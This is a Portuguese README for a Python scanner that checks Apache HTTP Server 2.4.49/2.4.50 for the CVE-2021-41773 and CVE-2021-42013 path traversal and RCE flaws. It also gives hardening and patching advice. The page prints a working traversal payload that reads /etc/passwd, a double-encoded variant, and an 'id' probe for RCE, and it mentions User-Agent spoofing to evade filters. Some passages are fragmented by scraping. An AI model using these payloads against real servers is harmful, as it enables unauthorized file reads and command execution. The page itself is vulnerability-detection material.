
Scanner baseado em Python para detectar as vulnerabilidades de path traversal e execução remota de código CVE-2021-41773 e CVE-2021-42013 no Apache HTTP Server 2.4.49 e 2.4.50.
Um scanner de vulnerabilidade abrangente baseado em Python para detectar as vulnerabilidades de CVE-2021-41773 e CVE-2021-42013 de path traversal e execução remota de código nas versões 2.4.49 e 2.4.50 do Apache HTTP Server.
CVE-2021-41773 e CVE-2021-42013 são vulnerabilidades críticas que afetam o Apache HTTP Server, permitindo que atacantes:
Essas vulnerabilidades ganharam ampla atenção em outubro de 2021 e foram ativamente exploradas em ambientes reais.
.%2e) contornem restrições de diretório/etc/passwd, execução de comandos arbitrários se mod_cgi estiver habilitado%%32%65)✅ Detecção Dupla de CVE: Testa tanto CVE-2021-41773 quanto CVE-2021-42013 ✅ Teste de Path Traversal: Múltiplas variações de payload para tentativas de acesso a arquivos ✅ Teste de RCE: Verificação de execução remota de código se mod_cgi estiver habilitado ✅ Varredura em Lote: Escaneia múltiplos alvos a partir de um arquivo ✅ Saída Colorida: Resultados formatados de fácil leitura ✅ Timeout Personalizável: Tempo limite de requisição ajustável para redes instáveis ✅ Falsificação de User-Agent: Contorna mecanismos básicos de filtragem
requestscoloramahttps://github.com/drackyjr/CVE-2021-42013.git
cd cve-2021-41773-42013
pip3 install -r requirements.txt
Ou instalar manualmente:
pip3 install requests colorama
python3 cve_scanner.py -u http://192.168.1.100
python3 cve_scanner.py -u https://target.com
python3 cve_scanner.py -u http://target.com -t 15
python3 cve_scanner.py -l targets.txt
python3 cve_scanner.py -h
| Argumento | Curto | Tipo | Descrição |
|---|---|---|---|
--url | -u | STRING | URL do alvo (ex.: http://example.com) |
--list | -l | FILE | Arquivo contendo lista de alvos (um por linha) |
--timeout | -t | INTEGER | Tempo limite da requisição em segundos (padrão: 10) |
python3 cve_scanner.py -u http://192.168.1.100
Crie targets.txt:
http://192.168.1.100
https://example.com:8080
http://10.0.0.50
https://vulnerable.server.com
Depois execute:
python3 cve_scanner.py -l targets.txt -t 15
python3 cve_scanner.py -u http://target.com -t 30
O scanner fornece uma saída detalhada incluindo:
Exemplo de saída:
============================================================
CVE-2021-41773 / CVE-2021-42013 Vulnerability Scanner
============================================================
[*] Target: http://192.168.1.100
[*] Testing CVE-2021-41773 (Apache 2.4.49)...
[+] VULNERABLE to CVE-2021-41773!
[+] Payload: /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
[+] Response:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
============================================================
Scan Summary
============================================================
[!] Target is VULNERABLE!
[!] Immediate patching required!
[*] Recommendation: Upgrade to Apache HTTP Server 2.4.51 or later
============================================================
.%2e)/cgi-bin/, /icons/, /images//etc/passwd e /etc/shadow%%32%65)id para verificar execução de códigouid= e gid= na respostaO scanner procura por:
root: ou daemon: de /etc/passwduid= e gid= da execução do comando id<Directory />
Require all denied
</Directory>
# Restringir acesso a diretórios sensíveis
<Directory /cgi-bin>
Require all denied
</Directory>
# Desabilitar links simbólicos se não for necessário
Options -FollowSymLinks
# Habilitar cabeçalhos de segurança
Header always set X-Content-Type-Options "nosniff"
Header always set X-Frame-Options "DENY"
# Verificar versão do Apache
apache2 -v
httpd -v
| Versão | Status | Ação |
|---|---|---|
| 2.4.49 | ❌ Vulnerável | Atualize imediatamente |
| 2.4.50 | ⚠️ Parcialmente Corrigida | Atualize para 2.4.51+ |
| 2.4.51+ | ✅ Corrigida | Nenhuma ação necessária |
⚠️ IMPORTANTE: Esta ferramenta destina-se APENAS a testes de segurança autorizados e fins educacionais. O acesso não autorizado a sistemas de computador é ILEGAL sob leis como o Computer Fraud and Abuse Act (CFAA) e legislação similar em todo o mundo.
Uso Autorizado Apenas:
Aviso de Uso Indevido: Os usuários são responsáveis por garantir que têm autorização explícita antes de testar qualquer alvo. Os autores não assumem nenhuma responsabilidade por uso não autorizado.
Este scanner é ideal para: